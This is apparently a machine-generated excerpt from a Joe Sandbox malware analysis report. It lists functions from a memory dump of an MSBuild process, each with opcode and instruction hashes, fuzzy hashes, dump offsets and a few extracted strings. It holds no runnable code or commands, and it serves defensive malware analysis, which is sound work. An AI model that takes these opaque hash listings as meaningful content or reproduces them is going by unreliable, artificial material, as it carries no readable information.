                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4a2a12b210cb63ff91f1f4e6b5923732592fd40b310b1d93c32159c7d42f8364
                                                                                                                • Instruction ID: 12c4cf42ebc9d69c6b655a90fd19cc7a1b1f6be5e53a75c304ad5b4afccbec34
                                                                                                                • Opcode Fuzzy Hash: 4a2a12b210cb63ff91f1f4e6b5923732592fd40b310b1d93c32159c7d42f8364
                                                                                                                • Instruction Fuzzy Hash: BC51A374E01618DFDB54DFAAD98499DBBF2FF89300F208169E809AB365DB31A905CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c0977707a6dd9e59bb392a7e8810f3a19e1cd4dbe0ea2facd3593dc5269a4412
                                                                                                                • Instruction ID: ea28b14a45f766944ac900edb1f1418875490aedfebc682a1e11030f65e88c5d
                                                                                                                • Opcode Fuzzy Hash: c0977707a6dd9e59bb392a7e8810f3a19e1cd4dbe0ea2facd3593dc5269a4412
                                                                                                                • Instruction Fuzzy Hash: 8151A375E01218DFCB58DFA9D89499DBBF2FF89310B208529E805AB364DB35AC42CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 74e2f310afd8c13ef22b7b0527b5ea8e2c0a148a3376259d51642a69f31cd573
                                                                                                                • Instruction ID: 11403ac799dc5c056512afcb712a1d52434e68a9dc334d1948c7e99044489952
                                                                                                                • Opcode Fuzzy Hash: 74e2f310afd8c13ef22b7b0527b5ea8e2c0a148a3376259d51642a69f31cd573
                                                                                                                • Instruction Fuzzy Hash: 7541E131A04269DFCF01CFA4D844A9DBFB2BF49320F048556E8159B2A1D376ED54EB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0cbab646d3519026f0e1ec57c3ffeab65aeae24e146d1060b38c6309055fec3
                                                                                                                • Instruction ID: 562f644097802f1c3c48671cd4bd357df8656a3b46db7b136866d30372b902ce
                                                                                                                • Opcode Fuzzy Hash: d0cbab646d3519026f0e1ec57c3ffeab65aeae24e146d1060b38c6309055fec3
                                                                                                                • Instruction Fuzzy Hash: CC312C727043658FC7079B78A81456E7BF3AFC6720714446AD555CB3A2CF358C06D791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bf3ebcfc880791130c7eb3cddefdd75ee87a16ecb62c7709d6c907e321def6eb
                                                                                                                • Instruction ID: 7cf45bc7b1e832f950ba5a8c69186f4a32820095ed579f3e20c74f37556220e1
                                                                                                                • Opcode Fuzzy Hash: bf3ebcfc880791130c7eb3cddefdd75ee87a16ecb62c7709d6c907e321def6eb
                                                                                                                • Instruction Fuzzy Hash: 17316E3160012DDFCF01AFA4E854AAE3BB2EB88710F104428F925DB255DB79DD61EFA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771593967.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_e3d000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5c1f7b32c43df63c02c2044f3eb1e9a7b0c2609379d33090d24c4824563e46fc
                                                                                                                • Instruction ID: be40a7e3aa675e76a21e1516dfad0c0760e449540bba1553c319413aa00a649c
                                                                                                                • Opcode Fuzzy Hash: 5c1f7b32c43df63c02c2044f3eb1e9a7b0c2609379d33090d24c4824563e46fc
                                                                                                                • Instruction Fuzzy Hash: 4B314D7150E3C48FC7078B24D9A4705BF75AF47214F2985DBD889DF2A3C22A980ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 379ed2e3e824842402c1112492dfe69ae8e858115e185ec8d3aa46cfd0cb5722
                                                                                                                • Instruction ID: 7ec958a3e38221616893c728eeb282a63896ddad78a7b3151ffaa929866ea9b7
                                                                                                                • Opcode Fuzzy Hash: 379ed2e3e824842402c1112492dfe69ae8e858115e185ec8d3aa46cfd0cb5722
                                                                                                                • Instruction Fuzzy Hash: CA21F53170116687DB15AB25A850B3E369BAFD47A8F248039D902CB398DE75CC43B382
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29cb930ee9511eb6ab2c96a7efa47e0e231f04d6879840758d24710484adde6b
                                                                                                                • Instruction ID: 9eb9ec21a5c54c714cb85c7e465f119a0734757da5fb444ee8e494da3834d870
                                                                                                                • Opcode Fuzzy Hash: 29cb930ee9511eb6ab2c96a7efa47e0e231f04d6879840758d24710484adde6b
                                                                                                                • Instruction Fuzzy Hash: 6D21283170126687DB15BB35B854B3E36979FD47E9B144039D942CB3A8DE65CC03B742
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd2756208f6de25e3e784b695d63f5a8d150821028d4746da9a3624932da3178
                                                                                                                • Instruction ID: f7a6387d63693070a0ea32b05b05841c25f884d72ae8972d7c22d0af16edc5d7
                                                                                                                • Opcode Fuzzy Hash: cd2756208f6de25e3e784b695d63f5a8d150821028d4746da9a3624932da3178
                                                                                                                • Instruction Fuzzy Hash: 80212331B056218FC7159B29E854A2EB7A2EFC9760714407DE816DB3A4CF34DC02AB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a25704f96d3a480b098d488f86d2a27111425d8046df7f8665a70c2b9810312
                                                                                                                • Instruction ID: b1525c1eb56bb8a85eeb4a4c1d8692bb3d04589c76c77da264d6eb5ad606c7a1
                                                                                                                • Opcode Fuzzy Hash: 2a25704f96d3a480b098d488f86d2a27111425d8046df7f8665a70c2b9810312
                                                                                                                • Instruction Fuzzy Hash: FE21C135A00125AFDB54DB24D850AAE77B9EBAD360F60C419E819DB240DB30EE82DBD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771593967.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_e3d000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 00b96526056cb5d6833259f73f0733ca87248c1f992b49c593ee75962b8aeb78
                                                                                                                • Instruction ID: abb12962fdcede95f605c60a809aa9710af5b24228c12266a2efce3051a5836c
                                                                                                                • Opcode Fuzzy Hash: 00b96526056cb5d6833259f73f0733ca87248c1f992b49c593ee75962b8aeb78
                                                                                                                • Instruction Fuzzy Hash: D2213771508204DFDB18CF24EDC8B16BFA6FB84718F24C56DE84A1B252C736D846CE61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60d0ed9b4184e86128b2ad0a206cb5f8e0636387c242666d117e9d53e84dac94
                                                                                                                • Instruction ID: ba23f4f2c6c4d0136ee7ee8a0fed11bdba8352be89ad455c5aacb26aa92e2936
                                                                                                                • Opcode Fuzzy Hash: 60d0ed9b4184e86128b2ad0a206cb5f8e0636387c242666d117e9d53e84dac94
                                                                                                                • Instruction Fuzzy Hash: DF21F031A051689FCB00AF64F848BAE3FA1EB98720F104068F815CB255CB788D61EFA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 71024218b57d62a2cc4d528efaa99146d70ed38a12b1871e0efa369c8b118fe6
                                                                                                                • Instruction ID: a5e069ec824a60230c82b668a2752e12faca8a3f8cb09188a2911386d276e4f9
                                                                                                                • Opcode Fuzzy Hash: 71024218b57d62a2cc4d528efaa99146d70ed38a12b1871e0efa369c8b118fe6
                                                                                                                • Instruction Fuzzy Hash: 12218B30E04258DFCB14DFA5E550AEDBFB6AF49300F288069E411E7294DB709D41EF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 65c7b02a91a3e478bd81f6e92e11cd14746aac3570226b6f7668639f9d22cd64
                                                                                                                • Instruction ID: 17d15e1613dd407d501a438d436423eca7d6c0d62f4178e429429a73581437f9
                                                                                                                • Opcode Fuzzy Hash: 65c7b02a91a3e478bd81f6e92e11cd14746aac3570226b6f7668639f9d22cd64
                                                                                                                • Instruction Fuzzy Hash: BA1126317016218FC7159B2AE85493EB7A6FFC97A13190078E816CB360CF70DC02ABD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d7dffb0f289e77961a5194ca85117cc7ca03a8f11e82e60db1a2c788e7158ab
                                                                                                                • Instruction ID: e06fbed6cb29ac69fce33414a438189f44b151dbd7aefcfbb5c9d87611b313a6
                                                                                                                • Opcode Fuzzy Hash: 5d7dffb0f289e77961a5194ca85117cc7ca03a8f11e82e60db1a2c788e7158ab
                                                                                                                • Instruction Fuzzy Hash: 29214971D0024A9FEB01EFB9D84179EBFF2EF40304F0485AAD444DB265EB745A098B80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4d4fb8d74b1df07876465766410305444dcc0e4b02459bf0c478e670b225f9bf
                                                                                                                • Instruction ID: 05051fbd2591a30ec9c5010aee73b569086b2f00b5148836966afad5d1b35d63
                                                                                                                • Opcode Fuzzy Hash: 4d4fb8d74b1df07876465766410305444dcc0e4b02459bf0c478e670b225f9bf
                                                                                                                • Instruction Fuzzy Hash: 6D21EF74C0924A8FCB01EFA9D8455EEBFF4EF4A310F10426AD815B3220EB745A85DBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60f8f7435207659f6dac3647ea0844ff20e99830fb6f7140bb4c3e8c47580ead
                                                                                                                • Instruction ID: ad79909aeaf430eb6b44314a55b938e257d1fac8ba296427783f364aa24169ca
                                                                                                                • Opcode Fuzzy Hash: 60f8f7435207659f6dac3647ea0844ff20e99830fb6f7140bb4c3e8c47580ead
                                                                                                                • Instruction Fuzzy Hash: 4D112971D0020ADFDB00EFB9D941B9EBFF1EB84304F04856AD104EB265EB745A498B81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 66f791751bd1b1436990343bf1b4f5e426162e2eca72e85a923f79f8b7d45315
                                                                                                                • Instruction ID: 12506814f11b2c215b2eff467020a95d3ca171577bcd6f28e7f8b01da6ab7edb
                                                                                                                • Opcode Fuzzy Hash: 66f791751bd1b1436990343bf1b4f5e426162e2eca72e85a923f79f8b7d45315
                                                                                                                • Instruction Fuzzy Hash: B8014C33B045286FCB128EB8AC00AEF3B96DBC8750F15802AF515D7280DF76CD11AB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85e2ce1a24811bd5e8c6798e8f0add4f572f8de126ba9f56196dd52f8ce844e6
                                                                                                                • Instruction ID: 552aca2d92e51150194204d32ff58fdb506218d924528f8a1530d0add99a4ceb
                                                                                                                • Opcode Fuzzy Hash: 85e2ce1a24811bd5e8c6798e8f0add4f572f8de126ba9f56196dd52f8ce844e6
                                                                                                                • Instruction Fuzzy Hash: 57F0F6317406244B87155A3EB854A2AB6DEEFC8B61315407AF905CB361EF60CC03D781
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0b93099856cb4d592fa0f3f0472ed5d6ecb36438a74d4271cb5962374032228
                                                                                                                • Instruction ID: 832446d1fc677a436cda2ac3aca5ca67f97e83a68e4f42e45ba10e8dc795a59d
                                                                                                                • Opcode Fuzzy Hash: b0b93099856cb4d592fa0f3f0472ed5d6ecb36438a74d4271cb5962374032228
                                                                                                                • Instruction Fuzzy Hash: D0014CB4D002499FDF00DFA8E944AAEBBB1EB58300F104525D814E3354E7355E56DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2ac5ded79621930bdfe397fe18a886b6cc8c67566021e7fd1b3662b43524d210
                                                                                                                • Instruction ID: 415a240f60a5d1e07a830bc69470405167a609af471adcfe5933b719b2f22b1a
                                                                                                                • Opcode Fuzzy Hash: 2ac5ded79621930bdfe397fe18a886b6cc8c67566021e7fd1b3662b43524d210
                                                                                                                • Instruction Fuzzy Hash: A9F01771A11125CF8B84EF78E40465A7BF1AF0821172144B9E909DB321EA309D048BD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f12b911f2a4a3bddecab9ae235f18cc983bdd455a62adbd9bcc3e389ea05e3ea
                                                                                                                • Instruction ID: 0fdd7a96045cf761a34423757ae55dfa387af46a2b8798fb63357c4121565c45
                                                                                                                • Opcode Fuzzy Hash: f12b911f2a4a3bddecab9ae235f18cc983bdd455a62adbd9bcc3e389ea05e3ea
                                                                                                                • Instruction Fuzzy Hash: 0CE0D831718329CF9B34DE3EE460B6173B9BF51321310456DE506CB250DB20EC80D758
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8983d6177034a907d8818115c38c93605cf24969dad1056ab882053058b3b533
                                                                                                                • Instruction ID: c3569a439ff785b81f13f7a499184b9fb013cd2c2b9d02ea6c996f0314b2e6d2
                                                                                                                • Opcode Fuzzy Hash: 8983d6177034a907d8818115c38c93605cf24969dad1056ab882053058b3b533
                                                                                                                • Instruction Fuzzy Hash: A6E0D83150C7A58FD7334639A8303653B757F13312B0A40ABE846C7091D614CC84D359
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 287ac1985ee3feea068ea278e2dd499bc4c9d883e180e1010bc7a7ac7821f45c
                                                                                                                • Instruction ID: 9df719172d4aa4d84126ca6649850e5da9bbd14579bf624269f1b44a63b599ff
                                                                                                                • Opcode Fuzzy Hash: 287ac1985ee3feea068ea278e2dd499bc4c9d883e180e1010bc7a7ac7821f45c
                                                                                                                • Instruction Fuzzy Hash: 9FE0C97A740104AFCB008F84DC41FDDBBB2FB8C711F244155FA11AB2A0C671A821DB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e143bbe8445d2fe242c0453728ee4bde86dd2e0b1255d139b840a5e885f4a3ae
                                                                                                                • Instruction ID: a9c782d9942afc86296c76610e54bcdb794044dffb89e94c92874d1851e8388a
                                                                                                                • Opcode Fuzzy Hash: e143bbe8445d2fe242c0453728ee4bde86dd2e0b1255d139b840a5e885f4a3ae
                                                                                                                • Instruction Fuzzy Hash: 59E02631D643E68FC702E7B09C200EFBB38ADC2111B59869BC0A577091EF34565DC7A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 573cbd215b13081667ef682eb5c7bc1ed33efaae8f85ac3f23f34bacff878172
                                                                                                                • Instruction ID: 7646d466cd161bf72352935b2ba85b02f33d58e5121708f48fef7e778f0d09b8
                                                                                                                • Opcode Fuzzy Hash: 573cbd215b13081667ef682eb5c7bc1ed33efaae8f85ac3f23f34bacff878172
                                                                                                                • Instruction Fuzzy Hash: 41D01732D202AA978B04A6A6DC048EEF73DEE96221B908626D52437140EB706669C7E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                • Instruction ID: 06f4e8e7bf03a6eefdb0371cf3ff17fa3ab4e50e5e6788f302da61fb46136bab
                                                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                • Instruction Fuzzy Hash: 1AC08C3360E1382AA234104E7C40EA3BB8DC3C13F4A210137FA2CD3240AC429C8221F8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3c767acca8968f3cbeb1e75dab521de700f6728af576c8194789d0d39b2b2303
                                                                                                                • Instruction ID: 5fba4f5c49c4f3637ff67337aa6c54508ffec7f21927dbf8202ef9dbff43fd99
                                                                                                                • Opcode Fuzzy Hash: 3c767acca8968f3cbeb1e75dab521de700f6728af576c8194789d0d39b2b2303
                                                                                                                • Instruction Fuzzy Hash: 71D05E7153C35A9BD702AB74AC52B883B12ABA0300F484B69D8018B45AEAF689289A10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eca7eb19a3bf20c1667942156466ae9c4054112fc56d2aaf244fb53598a8ffd7
                                                                                                                • Instruction ID: 72a7df8992f067a1abe016e729884d27c0aad6ed9cc039b2d7b79ce1b9cb4344
                                                                                                                • Opcode Fuzzy Hash: eca7eb19a3bf20c1667942156466ae9c4054112fc56d2aaf244fb53598a8ffd7
                                                                                                                • Instruction Fuzzy Hash: 87D0677BB00008DBCB049F98EC409DDF776FB98221B048116E925A7260C6319965DB60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2465652b15e0ca8ce6ad3791d452aca4b2517ae3cf9314b00d54e8ef78e31926
                                                                                                                • Instruction ID: 0f7cb3046d8a98d2111fdc2b87592e4b5e3883b9708c0c549b8d66b2f4fd7557
                                                                                                                • Opcode Fuzzy Hash: 2465652b15e0ca8ce6ad3791d452aca4b2517ae3cf9314b00d54e8ef78e31926
                                                                                                                • Instruction Fuzzy Hash: BCD02B320047428FC30AE728F550C4CFFB5AEC1310344495FC2D88B075DB6066458B41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 331b36a8737a18729460b8efa18a8a424f9d634970eaeda176f930420906b2d1
                                                                                                                • Instruction ID: a1669950d3231059b265d7faef369f5d0ea6c8947c14177ddcb66b6fb8479ef4
                                                                                                                • Opcode Fuzzy Hash: 331b36a8737a18729460b8efa18a8a424f9d634970eaeda176f930420906b2d1
                                                                                                                • Instruction Fuzzy Hash: 0EC0123012031E87D500BBB5FC56B59375AB690300B449615950586519DEF85D244A94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PG$PG$PG$+r^
                                                                                                                • API String ID: 0-1402843547
                                                                                                                • Opcode ID: 93e248f2c7edfbe8f4d158820eef61a7627012abae6e712e98e66ff71da5b126
                                                                                                                • Instruction ID: b544f8a8149b6aeaa1a9fd1fb1f060a7451540b89908bedb070a9f53aab61783
                                                                                                                • Opcode Fuzzy Hash: 93e248f2c7edfbe8f4d158820eef61a7627012abae6e712e98e66ff71da5b126
                                                                                                                • Instruction Fuzzy Hash: D821AC34E04258EFDB05EFB9E4157AEBBB2EB85300F1084A99424AB395CB386E05DF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PG$PG$PG$Kr^
                                                                                                                • API String ID: 0-3626761598
                                                                                                                • Opcode ID: ed333a4a8e6a7df4ea54fbb73e854738e0021e7ba5cb9fc0da3ea18c459493e7
                                                                                                                • Instruction ID: 80cca42f963b6fe8feb567d201176a52987c0d4c7eb7524d4b303118c90d156a
                                                                                                                • Opcode Fuzzy Hash: ed333a4a8e6a7df4ea54fbb73e854738e0021e7ba5cb9fc0da3ea18c459493e7
                                                                                                                • Instruction Fuzzy Hash: E921A174E04259DFCB04EBB9E4557AD7BB2EF85300F10C4B99424AB395CB389A05DF40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
